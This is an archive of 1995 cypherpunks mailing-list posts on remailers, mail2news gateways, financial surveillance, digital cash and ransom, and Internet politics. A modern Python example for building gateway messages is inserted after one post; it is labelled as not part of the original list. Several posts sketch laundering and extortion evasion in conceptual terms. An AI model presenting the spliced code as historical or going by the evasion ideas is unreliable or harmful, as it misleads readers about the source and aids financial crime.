Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMFbufqDthkLkvrK9AQEl/AP+I++gw4+zs3TBMbmLZTrydX+EQ/eJ0mX2
IxldmyS7raU1y2jGo+K3M3NYYQMmY0D9+HGKpvJef4p8GRQ6/R4beMAqsOUNgN+h
fgIt9Szf7+gVdmJas8Nu5RmFEV9l4pieoSvHfQuQnMl++BEPJ7/13vG+E22Bf5bs
tbxy1VZX4QI=
=itux
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Sep 95 07:48:17 PDT
To: cypherpunks@toad.com
Subject: FUZ_fat
Message-ID: <199509131448.KAA18880@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-13-95. W$Japer:


   "Software May Dry Up Money Laundering."

      Can artificial intelligence be used to combat crime by
      ferreting out money laundering? Officials at law
      enforcement, defense and intelligence agencies like to
      think so. They have suggested creating a sophisticated
      computer program to screen records of the more than
      700,000 electronic money transfers involving U.S.
      institutions each day and to flag suspicious ones for
      further investigation. By using AI, they hope to stop
      some of the $300 billion in profits from drug deals and
      other illegal activities that they estimate is laundered
      world-wide each year. But in a report issued yesterday,
      the congressional Office of Technology Assessment says
      any such plan would face considerable obstacles.
      [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]


   FUZ_fat







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 10:48:20 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <ac7c634618021004e6d8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:43 AM 9/13/95, Peter Trei wrote:

>                  "CYPHERPUNK" considered harmful
>
>     I would like to propose that we, the 'cypherpunks', are making a
>strategic error, which will make it far more difficult to achieve the
>goal we share.

Discussing some goals we might share, or ought to share, is certainly not
out-of-line. Indeed, this discussion has come up many times on this list,
though perhaps not much in the past year. (Those C coders do seem to be
having their way...:-} ).


>     Our error lies in our approach to encouraging the widespread use of
>crypto. It is an error of hubris - overweening pride.

I think many people here are doing a lot to encourage wide use of
encryption, remailers, etc. They write hooks to popular mail programs, they
give public talks, they fight against restrictions and regulations, and
they deploy new systems. That some folks have very occasionally mentioned
"Joe Sixpack" does not mean that much, in my opinion.

>
>     We too often think of ourselves as an elite - smarter and better in
>various ways to our non-cpunk neighbours. We refer to these others as
>'Joe Sixpack' and other such derogatory terms.
>
>     The problem is that in doing so we are marginalizing ourselves.
>
>     We call ourselves 'cypherpunks'. While this is derived from the SF
>term 'cyberpunk', consider the image we are creating for ourselves:
>
>     A 'punk' is a marginalized young adult, one who rejects the norms
>of his or her society, and takes delight in irking those around him with
>his or her rejection. The older of us will think of James Dean in 'Rebel
>Without a Cause', or Brando in 'The Wild One'. Later, you get images
>such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
>other icons of the 'punk rock' movement.

While I have had some qualms about the name, on balance I think it has been
good for us. After all, it's not as if _other_ groups don't already exist!
In particular, the British branch of Cypherpunks disliked the name
"Cypherpunks" so much that they used a different name for themselves, the
"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
whatever reasons. But the name may have been a factor, at least.

Similarly, there's the Libertarian Party, with similar themes to our own,
the International Association of Cryptographic Research (or somesuch), and
even several nascent groups like "Terra Libre" and "DigitalLiberty" which
purport to have a similar focus to what we have. And of course there are
_several_ groups devoted specifically to lobbying for various sorts of
cyberspatial rights, laws, etc.: EFF, EPIC, CPSR, VTW, and the ACLU. All of
these groups have a different focus than we have. If I were to pick one
that matches Peter Trei's proposed organization, it would be the EFF. Thus,
I suggest Peter and others of like mind look into helping out the EFF in
its worthy causes. I mean no disrespect here to Peter's views, nor am I
suggesting he leave this list. Plenty of room for support of the EFF and
being on this list. I'm a member of the EFF, for example (though their
computer has me as "Tim Mat" for some reason).

But for some reason--draw your own conclusions--the Cypherpunks list has a
membership of something like 600-800 subscribers, more if you count folks
who subscribed for a while, or who read it in other places. I don't think
"Terra Libre" or "DigitalLiberty" are quite as successful and visible.

We fill a certain niche which is useful to have filled, a more radical
facet of things. If we didn't exist, or renamed ourselves "Concerned
Citizens for Cryptographic Protection," CCCP, then somebody would have to
_invent_ the Cypherpunks!

I addressed the issue of our name, pluses and minuses, in an early chapter
of my Cyphernomicon (http://www.oberlin.edu/~brchkind/cyphernomicon/):

2.4.10. "Where did the name 'Cypherpunks' come from?"
           + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000,"
              was at the earliest meetings...she quipped "You guys are
              just a bunch of cypherpunks." The name was adopted
              immediately.
             - The 'cyberpunk' genre of science fiction often deals with
                issues of cyberspace and computer security ("ice"), so
                the link is natural.  A point of confusion is that
                cyberpunks are popularly thought of as, well, as "punks,"
                while many Cyberpunks are frequently libertarians and
                anarchists of various stripes. In my view, the two are
                not in conflict.
             - Some, however, would prefer a more staid name. The U.K.
                branch calls itself the "U.K. Crypto Privacy
                Association." <check this> However, the advantages of the
                name are clear. For one thing, many people are bored by
                staid names. For another, it gets us noticed by
                journalists and others.
             -
           - We are actually not very "punkish" at all. About as punkish
              as most of our cyberpunk cousins are, which is to say, not
              very.
           + the name
             - Crypto Cabal (this before the sci.crypt FAQ folks
                appeared, I think), Crypto Liberation Front, other names
             - not everybody likes the name...such is life

--------

Getting back to your suggestion that "we" change the name to something more
respectable. How could "we" do this, given that "we" are an effective
anarchy?

I can't imagine a vote on this, and the endless debates on what "we" ought
to call ourselves would be a waste of time.

Fortunately, there's an elegant solution: form your own group.

Form your own group, your own mailing list, with a catchy name, something
like "The Privacy Education Foundation," or "The American Civil Liberties
Union" (whoops, taken), or "The Society for the Preservation of
Cyberspatial Liberty."

Then announce it on our list, and elsewhere. People will vote with their
feet. If your "meme" is catching, your list will rapidly gain members.
Maybe this Cypherpunks list will even atrophy away.

Evolution in action. The market in action. A better approach than trying to
get the name and the charter changed.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 13 Sep 95 08:01:54 PDT
To: cypherpunks@toad.com
Subject: Recent articles
Message-ID: <9509131501.AA04394@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Jon Bentley's column in this month's Unix Review talks about protecting
data.  As with all his columns, it's short but manages to touch on a
large number of issues; in this case, using page faults to guess passwords,
threat models, and so on.

Upside, "The Business Magazine for the Technology Elite" (http://www.upside.com)
has an interview with Jim Clark that took place two weeks before the IPO.
He discusses in a couple of places how using crypto over the Internet is
critical for businesses that can't afford private nets, and how this is
an important part of their business plan.

(Prof Froomkin:  Upside also has an article on "ITEF infighting" you might
want to read.)
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 13 Sep 95 08:19:14 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" and net monitoring
In-Reply-To: <199509131202.AA15294@personal.eunet.fi>
Message-ID: <9509131518.AA22994@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> >(4) Is the April 9 statement by David Lytel of the White House Office of
>> >    Science and Technology to Amy Bauer of Copley News Service that the
>> >    administration does not monitor anti-Clinton activity on the web still
>> >    operative?

>Probably they do and they really should. If I was Mr. Clinton (which 
>I luckily am not) I would want my adjudats to prepare a report for
>me each morning summing up all the possible comments round 
>subject Clinton and The USA from NET: That would be very precisious
>source of feedback to finetune your acts. And that information 
>is real time.

Nope, they don't; the Democratic party aides do that type of work from Democrat 
HQ.

The President gets a once a week summary of all the mail he gets including the 
email.  I think they also provide a daily press digest.

By monitoring Lytel was probably thinking about installing net sniffers etc or 
obtaining the data from the FBI or whoever. I am certain he didn't mean to say 
that he does not surf the net ever and does not occasionally visit opposition 
sites. 

The term monitor implies an organised search and continuous checking procedure. 
The number of hits cited sounds more like someone passed round the URL of a kook 
site inside the office.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 13 Sep 95 09:32:16 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK/weak crypto rationale?
Message-ID: <9509131628.AA00879@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis writes:
[...snip...]
>  Particularly effective were the court-approved video and audio
>  tapes of the Speaker taking a bribe in exchange for certain action
>  on legislation
[...snip...]
>  Wiretaps, hidden microphones, and hidden cameras put corrupt
>  politicians (I know - redundant) out of business.

Encryption does little to protect you from hidden cameras and microphones (or  
informants!).  If you already know your target then you can probably get  
around encryption (sure it's not as simple as a wiretap, but hey, nobody said  
it had to be easy).  Encryption prevents 'fishing expeditions' and  
unauthorized monitoring;  this is what the LEAs don't want to admit.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 08:57:53 PDT
To: hallam@w3.org
Subject: Web Proxy Servers
Message-ID: <199509131531.LAA18512@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 9/12/95 -0400, hallam@w3.org wrote:

>If they ever want an anonymous proxy server they are welcome to use ours.

So where's a pointer to it?  Others might be interested.  Even willing to pay.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Wed, 13 Sep 95 11:35:04 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster posting poll
Message-ID: <ac7cd3c3030210044820@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


I think that I am not being clear enough about what I want to do.

Back when I started running remailers, I was using a machine with no local
news software at all. Rather than compile a bunch of software just to allow
the "Anon-Post-To:" command to work, I hacked the scripts to automatically
send those messages to a mail2news gateway. Mixmaster now has a similar built
in anonymous posting ability. If you have inews on your machine, then Mixmaster
can build the "Newsgroups:" header and send the message to inews.
But what if you are running Mixmaster and you don't have inews but you want
to support posting? The answer is to have Mixmaster put together a message
to send to a mail2news gateway for it to post.

When I look at the currently available public mail2news gateways, I see that
two standards already exist. The first is the group.name@gateway.
The other is mail2news@gateway with a "Newsgroups:" header.

It is easy for me to have mixmaster take the request for anonymous posting,
and build the appropriate message for whichever kind of gateway I want to use.

I only want to support one of them. The question is, which one should I
support? Which are there more of? Which are there likely to be more of in the
future?

I seem to recall that someone on this list wrote some mail2news software.
Who was it and which standard did it follow (if either)? Has anyone installed
it? Is anyone else planning to install it? I will install a gateway when I
get my T1 (in a couple of months).


        -Lance

At 8:35 AM 9/13/95, Rich Salz wrote:
>>       If the form alt.usenet.group@remailer.com was used, wouldn't the
>> system running the remailer have to have an alias defined for each and
>> every newsgroup that it plans on handling?
>
>No.  Sites running sendmail, for example, could set up rules that
>just knew the top-level hierarchies and fed those into a special
>"mailer" that gatewayed them.
>
>My opinion is that making any names well-known is a bad idea, and
>that attaching special semantics to "mail2news@xxx" is a real bad
>idea.  Instead, just send the message to the specified recipient
>and let it do whatever magic needs to be done.
>
>If mixmaster wants to function as a mail/news gateway, it should
>do something special when it sees the Newsgroups header -- process
>the message and feed it into rnews, presumably.
>
>I guess, but not yet having read the code do not know, that this is
>cleaner and more easily extensible (or removable).
>        /r$

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------
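
The two gateway conventions discussed in the message above, built side by side. This is an added example, not Mixmaster's code or anything posted to the list; the function names and the host gateway.example are assumptions, and the group-name check is included because the "Anon-Post-To:" value arrives from an untrusted sender.

```python
import re
from email.message import EmailMessage

# Dot-separated newsgroup name with at least two components. Anything else
# (CR/LF, '@', spaces) is rejected so that a request cannot inject extra
# headers or turn "group@gateway" into an arbitrary mail address.
GROUP_RE = re.compile(r"[a-z0-9][a-z0-9+_-]*(?:\.[a-z0-9][a-z0-9+_-]*)+")


def parse_groups(anon_post_to):
    """Split and validate the value of an Anon-Post-To: request."""
    groups = [g.strip().lower() for g in anon_post_to.split(",") if g.strip()]
    if not groups:
        raise ValueError("no newsgroup given")
    for g in groups:
        if not GROUP_RE.fullmatch(g):
            raise ValueError("bad newsgroup name: %r" % g)
    return groups


def _base_message(subject, body):
    if "\r" in subject or "\n" in subject:
        raise ValueError("line break in Subject")
    msg = EmailMessage()
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def build_address_style(groups, gateway_host, subject, body):
    """Convention 1: group.name@gateway, one recipient per newsgroup."""
    msg = _base_message(subject, body)
    msg["To"] = ", ".join("%s@%s" % (g, gateway_host) for g in groups)
    return msg


def build_header_style(groups, gateway_host, subject, body):
    """Convention 2: mail2news@gateway plus a Newsgroups: header."""
    msg = _base_message(subject, body)
    msg["To"] = "mail2news@%s" % gateway_host
    msg["Newsgroups"] = ",".join(groups)
    return msg


if __name__ == "__main__":
    # Constructed sample request.
    groups = parse_groups("alt.test, sci.crypt")
    for build in (build_address_style, build_header_style):
        print(build(groups, "gateway.example", "test post", "hello\n"))
        print("-" * 40)
```

With the address form a cross-post becomes several recipients, so the gateway may see it as independent postings; the header form carries the whole group list in one message.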






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 08:51:21 PDT
To: John Young <jya@pipeline.com>
Subject: Software vs Money Laundering
Message-ID: <199509131549.LAA22502@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 AM 9/13/95 -0400, John Young wrote:

>      Can artificial intelligence be used to combat crime by
>      ferreting out money laundering? Officials at law
>      enforcement, defense and intelligence agencies like to
>      think so. They have suggested creating a sophisticated
>      computer program to screen records of the more than
>      700,000 electronic money transfers involving U.S.
>      institutions each day and to flag suspicious ones for
>      further investigation. By using AI, they hope to stop
>      some of the $300 billion in profits from drug deals and
>      other illegal activities that they estimate is laundered
>      world-wide each year. But in a report issued yesterday,
>      the congressional Office of Technology Assessment says
>      any such plan would face considerable obstacles.
>      [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]
>

Not the least of which is that money launderers can use "AI Software" to
generate a stream of real and dummy money transfers that emulates "normal"
money transfers.  Not to mention the fact that monopoly money transfer
networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long
for this world.  They will be replaced by encrypted, open, net-based systems.

DCF

"Yes Virginia, one *can* have an encrypted, open system.  In fact, that's
the best way to have an open system."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Tue, 12 Sep 95 18:59:19 PDT
To: starrd@iia2.org (starrd)
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <Pine.BSD.3.91.950907174613.22454G-100000@usr2.primenet.com>
Message-ID: <199509130156.LAA29400@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello starrd <starrd@iia2.org>
  and Ray Cromwell <rjc@clark.net>, cg@bofh.lake.de, cypherpunks@toad.com

starrd wrote:
> On Thu, 7 Sep 1995, Jiri Baum wrote:

...
> > >: : >>: 
...[snip]
> I gotta read more of this drivil!   ROTFL!   ROTFL!!!
...

I feel I should point out that you have no proof that the text you have
attributed to me was in fact posted by me, and in fact you have reason
to believe otherwise since I usually PGP-sign my entire post including
any signature.

> I know this is somewhat off-topic, but I just *had* to say it!

Off topic, but I have been publicly accused so I feel I should publicly
respond in the same forum.


Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMFY6KixV6mvvBgf5AQELzwP6AsLfSPuRLUyXYXLYqgfyZ4FZD4BVNt14
xYj6HtZwYOgLWnfR344minIcWTNuMbgK6qbeUzWRHEfmcVZFFDHknJi2KPotDb2h
VL84dX6qLHpogCyh+bIVt2AvUoAOdYzbIKsC8tIPyaDkDhp7XNUOmXygqllkAuVo
El8eN1kuS9U=
=lqRY
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Wed, 13 Sep 95 09:10:59 PDT
To: cypherpunks@toad.com
Subject: An opportunity not to be missed
Message-ID: <199509131610.MAA26686@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It has occurred to me with the approach of the presidential campaign
in the US (and its attendant press frenzy), that there is an
unprecedentedly vast opportunity to bring certain items on the
cypherpunk platform into the public spotlight.

There are two planks of this platform that I believe:

  1. would benefit from this exposure;
  2. would be relatively easy to inoculate among the press
     and/or the candidates (actually, inoculation of the
     candidates, with subsequent propagation by the rabid
     campaign press).

The first of these has to do with net.censorship, and formal
recognition under law of ISPs' common carrier status.  The second
concerns remailers.  I'll deal with each in turn.

I believe that, given the hunger of the candidates for as much
exposure as possible, that one of them might be persuaded to take a
part in the Scientology fracas.  (This would have to happen fairly
soon, since it looks like the Church <spit> is losing some major
battles lately - the brand new news from Denver re:FACTnet and the
ruling in VA concerning Arnie Lerma and the Washington Post).  The
desirable features of such a candidate might include: a certain amount
of current power, marginal current press exposure, fairly deep
pocketed financing, an anti- regulatory stance, and a smidgeon of net
awareness.  It should be fairly straightforward to convince such a
candidate that:

  1. there would be tremendous increase in exposure due to
     the songs of praise from netizens (whose influence is most
     likely to be overly discounted by campaign strategists,
     IMHO, at this point in time), and from the mainstream press
     (especially Time magazine and the Washington Post, for obvious
     reasons).

  2. that the exposure would be worth the peril of inviting
     the wrath of the Church <spit>.


The payback of the press coverage of such a candidate would be infection
of John Q. Public with the idea that ISPs are no more responsible for
content of carried messages than the phone company, and an anti-censorship
stance that does not make him (John Q.) pro-porn.  This last is a huge
flaw in the current battle for free speech on the net, IMO.  (Thank
you Marty Rimm.)  If this issue could be refocused, I think that
John Q. (and Jane) would find it much easier to support.

The second plank that could be potentially advanced is anonymity.  Anonymous
remailers in particular, but the benefits of anonymity to users of the
Net in general as well.

I propose that we get some likely candidate (actually, a similar candidate
to the one above) to advocate the benefits of anonymity on the net.  The
"spin" that would have to be used would depend on the particular candidate,
but let's say, for example, we have:

     Candidate Posturing                    Required Spin
     -----------------------------------------------------------------
     Pro-business, tough on crime           anonymous crime tip e-mail
                                            a la Fed whistleblower stuff,
                                            and the SPA

     Pro-choice, womens' vote               anonymous support services


Of course, there are many more examples, but we'd have to see which postures
this campaign's candidates are going to pick.  Of course, I am somewhat
cynical in my advocation of the particular "Required Spins" (the SPA support,
especially), but I feel that the threats to privacy and public use of strong
encryption (which walks hand in hand with the use of the remailers, naturally)
are worth the potential risk on other fronts (the burgeoning software patent
silliness, eg).

You may ask why these candidates would be interested in this type of thing,
and my response is that they can be forced.  The religious right has no
problem bringing their agenda into the public spotlight and forcing their
issues onto candidates because of their willingness to use hyperbole and 
fanaticism (not to mention pressure on advertisers and other sponsors).

I believe that netizens in general, and cypherpunks in particular can
bring similar, and more reasoned, pressure to bear.  I think that our
job is easier than the religious right because it should be trivial to
enlist the support of the mainstream press on these issues, and to direct
the anti-federal ire that has been building in the US.  In addition,
Democratic candidates that are currently in office would love to have some
way of attacking the Republican plans for this session of Congress.  An
attack on net.censorship via the CDA and the telecomm bill could be seen
as the ideal place to attack the Republican agenda, and thereby the
success of Republican candidates in the presidential race.

<whew.>

Let the flames begin.

- - David C. Lambert
  dcl@panix.com
  (finger for public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFcB+qpplsfgM88VAQFdewP9G0aHVTweUeCMa7J7Xhtu2R4cID6yP/J3
7WS5OicRWfl/hPRXj1Db74A9tDrkStEfobbL/2H6CsO9N4wZNgcDLQAa5MjX8ujf
0EF6v57nlcANb1qLJ5kmwfGj96PUMDtw00409tin3KssRAL0uz/lL9SWP/Mhj9q5
emZHYW3VC3c=
=bTsO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Wed, 13 Sep 95 09:11:42 PDT
To: cypherpunks@toad.com
Subject: Dirty Pix Ad
Message-ID: <199509131611.MAA28295@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, Sept 13, 1995.


Scientist urges action on Internet pornography

By Clive Cookson


Pornography accounts for about half of non-academic use of the
Internet, the global computer network, the British Association
science conference heard yesterday.

Prof Harold Thimbleby, professor of computing research at
Middlesex University, said most parents, politicians and
educators had no idea how easy it was to find graphic
descriptions of horrific perversions, through any personal
computer linked to the net.

"If you want to know about any perversion, you can find full
details," Prof Thimbleby said, "and they are described in
deceitful and evil ways."

He was particularly upset by Internet porn sites that
masquerade as victim support groups, such as those for child
abuse that tell paedophiles how to entrap children. "I have
found text, film and sound material that I find extremely
disturbing, for example instructions for killing minors for
sexual gratification."

Prof Thimbleby has been researching the pattern of traffic on
the Internet since the beginning of the year.

It is impossible to monitor how more than a tiny fraction of
the estimated 30m to 40m users utilise the net. But Prof
Thimbleby analysed a representative sample of "bulletin
boards" and of searches made via so-called "web crawlers"
which act like telephone directories for the World Wide Web,
the fastest growing part of the Internet.

He said his conclusion - that pornography accounted for about
50 per cent of the searches - tallied with recent US findings
about the dominance of porn on the net.

"There is no reliable way, technical or otherwise, to detect
or intercept pornography," Prof Thimbleby said.

Censorship of the Internet was impossible, because
pornographers could easily disguise their material. And
censoring programs such as SurfWatch and Internet Filter could
not cope with all the fast-changing pornographic material.

Because censorship was technically and politically
impractical, Prof Thimbleby suggested that a better response
was to dilute the pornography with other material.
"The Internet has very little interesting material for the
non-specialist user. It needs more," he said. "When it has
more, it is just possible that pornography will slip into its
statistically appropriate place, one aspect of humanity but
not the most prominent on the Internet."

-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Wed, 13 Sep 95 09:15:56 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Software vs Money Laundering
In-Reply-To: <199509131549.LAA22502@panix.com>
Message-ID: <Pine.3.89.9509131257.A17575-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Duncan Frissell wrote:

> At 10:48 AM 9/13/95 -0400, John Young wrote:
> 
> >      Can artificial intelligence be used to combat crime by
> >      ferreting out money laundering? Officials at law
> >      enforcement, defense and intelligence agencies like to
> >      think so. They have suggested creating a sophisticated
> >      computer program to screen records of the more than
> >      700,000 electronic money transfers involving U.S.
> >      institutions each day and to flag suspicious ones for
> >      further investigation. By using AI, they hope to stop
> >      some of the $300 billion in profits from drug deals and
> >      other illegal activities that they estimate is laundered
> >      world-wide each year. But in a report issued yesterday,
> >      the congressional Office of Technology Assessment says
> >      any such plan would face considerable obstacles.
> >      [Cyberian Joel Reidenberg, an OTA advisor, is quoted.]
> >
> 
> Not the least of which is that money launderers can use "AI Software" to
> generate a stream of real and dummy money transfers that emulates "normal"
> money transfers.  Not to mention the fact that monopoly money transfer
> networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long
> for this world.  They will be replaced by encrypted, open, net-based systems.


The article fails to point out that this system - actually one much 
larger in scope - already exists as Treasury's FINCEN system, headed by a 
former Army AI expert. FINCEN sifts all the bank transfer manifests and, 
last I looked, had stuck tentacles into other agencies' databases to 
further collate and refine its focus - now toward locating potential 
targets.  FINCEN was only supposed to be marshalled for Justice 
Department investigations of suspected money laundering. Next, it'll be 
used to auto-author warrants and indictments. . .





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 13 Sep 95 10:52:48 PDT
To: "David C. Lambert" <dcl@panix.com>
Subject: Re: An opportunity not to be missed
In-Reply-To: <199509131610.MAA26686@panix.com>
Message-ID: <Pine.SUN.3.91.950913134743.7787A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, David C. Lambert wrote:

> I propose that we get some likely candidate (actually, a similar candidate
> to the one above) to advocate the benefits of anonymity on the net.  

Try Harry Browne (http://www.rahul.net/browne).  I'm 100% certain that he 
would be willing to support cryptographic rights and freedom of internet 
speech.

> You may ask why these candidates would be interested in this type of thing,
> and my response is that they can be forced.  The religious right has no
> problem bringing their agenda into the public spotlight and forcing their
> issues onto candidates because of their willingness to use hyperbole and 
> fanaticism (not to mention pressure on advertisers and other sponsors).

The Religious Right brings their agenda to the public spotlight because
they become incredibly involved in local politics on a nationwide basis
and have the knowledge, means, and money to influence politics at this
level.  Very few people who are outside the political process realize the
amount of organization, dedication, and dollars required to achieve
political validity. 

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 13 Sep 95 14:24:10 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <ac7b776f120210047e03@[205.199.118.202]>
Message-ID: <199509132121.OAA05728@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:
> Although I am
>thought of as a "crypto anarchist," and basically am such a thing, the fact
>is that there aren't a lot of trials for thoughtcrime in this country. I
>have some doubts about the circumstances surrounding Danny Casolaro's
>death, though, so I don't say all is rosy and perfect. 

amusingly, on one of those web sites, the death of Casolaro is indeed
tied in with the conspiracy that "touched" (to say the least <g>)
Vince Foster.

the Whitehouse web hits are potentially interesting. I agree they
don't imply any "dissident web monitoring program". the question of
how high a staffer hit those pages and for what reasons is still
unanswered. if it was indeed just Joe Sixpack on a presidential
tour, playing with the machines, not even employed with the whitehouse, 
or perhaps some bored college intern, then I agree that nothing significant 
is going on. but it is fun to fantasize about Hillary or Bill getting
an eyeful and thinking that *pornography* on the internet pales in
comparison to *this* little problem!! <g>

now, those "dissident" web sites are not as innocuous as you might think. 
they are not run-of-the mill "I hate the president and republicans too" sites.
one of them is the absolute master repository on the internet for
all the rampant, hardcore Foster conspiracy theories talking about
NSA bank spying, whitewater, etc. these are *not* something you would find 
in a library, or expect anyone without an interest in conspiracy theories 
to be reading. and from what the article suggests, the browsing was
pretty thorough. it would be interesting to ask the site maintainer,
something I might do.

I suspect that a lot of this Foster stuff is going to hit the media big
time when the mud starts to sling during the presidential election,
when it really counts. I think that someone is sitting on a lot
of anti-clinton ammo. the 3rd candidate possibilities are very strong
in 96, because of all the junk coating the Republicrats and Demopublicans.

recall that the "october surprise" suspicions regarding Reagan really
hit the media big time, and supposedly that was a highly secret 
intelligence operation. so I think that there is a kind of rough
government accountability, it's just that it only happens about every
4 years or so and is *awfully* messy.. <g>



--Vlad Nuri






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Sep 95 14:22:36 PDT
To: cypherpunks@toad.com
Subject: Digital Cash on sci.crypt
Message-ID: <199509132121.OAA25994@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been some discussion on sci.crypt of digital cash and its
facilitation of kidnapping, extortion, etc.  Here is a posting I made
which mentions an on-line paper on the topic.  I had met the author,
Markus Jakobsson, at Crypto 95, but I only had a chance to check out his
web site yesterday.


awc@slcawc.aug.ipp-garching.mpg.de (Arthur Carlson TOK ) writes:

>[In response to a discussion of whether digital cash could be used to
>provide anonymous collection of ransom money]

>Is there really no technical fix for this? To enable the prevention of
>double spending in off-line systems, the ID of the withdrawer is coded
>into the coins in a way that is verified by the bank. If the victim's
>relatives can undo enough of the code to satisfy the bank, why can't
>they undo the rest to detect when the coins are spent? Alternatively,
>why can't the bank put an identifier on the coins (in a way that isn't
>destroyed by the unblinding) that amounts to a message encoded in the
>public key of the withdrawer? Then the withdrawer can make the
>destination of the ransom money visible by revealing his private key
>(after the victim has been released, of course). (He also reveals
>every dime he spent in the last year and all his kinky love letters,
>but, hey, we're trying to catch a kidnapper here.)

There has been considerable discussion of this problem in the
literature recently.  A paper I found yesterday on the net is by Markus
Jakobsson and Moti Yung: Revokable and Versatile Electronic Money, at
<URL:http://www-cse.ucsd.edu/users/markus/revoke.ps> (postscript
format).  It has references to other work as well.

The specific attack I discussed earlier applies to the current DigiCash
scheme (or at least how it is assumed to work).  Offline cash systems
would be more complicated.  The references in the paper mentioned above
describe how these attacks would work on such systems and some ways of
avoiding them.

However there is a more powerful attack, which the Jakobsson paper
addresses, in which the bank as a whole is coerced.  Maybe terrorists
threaten to blow up the World Trade Center unless Citibank engages in a
specific protocol which will leave the terrorists with millions of
dollars in fully blinded electronic cash.  Even if the normal withdrawal
protocol has signatures, etc. which would prevent this, Jakobsson shows
that there is a corrupted protocol which if the bank is forced to follow
it will leave the criminals with valid but untraceable electronic cash.

The solution in the paper is to make it so that none of the ecash
issued by the bank is untraceable.  Under normal use it is anonymous,
but if necessary the authorities can break the anonymity.  This is
sometimes called "Clipper cash" after the U.S. Clipper chip proposal
which had similar privacy properties.

With Jakobsson/Yung's approach even the more powerful attack can be
defeated because the cash is traceable, and no amount of coercion will
allow the attacker to create valid but untraceable cash.

